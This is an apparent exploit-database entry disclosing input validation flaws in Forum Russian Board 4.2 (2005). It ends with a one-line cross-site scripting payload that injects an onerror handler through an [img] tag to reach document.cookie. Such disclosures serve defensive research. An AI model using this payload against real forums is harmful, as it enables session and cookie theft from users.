CarLine Forum Russian Board 4.2 - IMG Tag Cross-Site Scripting

EDB-ID:

25877

CVE:

17486

Author:

1dt.w0lf

Type:

webapps

Platform:

PHP

Published:

2005-06-23

source: http://www.securityfocus.com/bid/14045/info
 
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
 
Forum Russian Board 4.2 is reported to be affected. 

[img]wink.gif onerror=javascript:alert(document.cookie);[/img]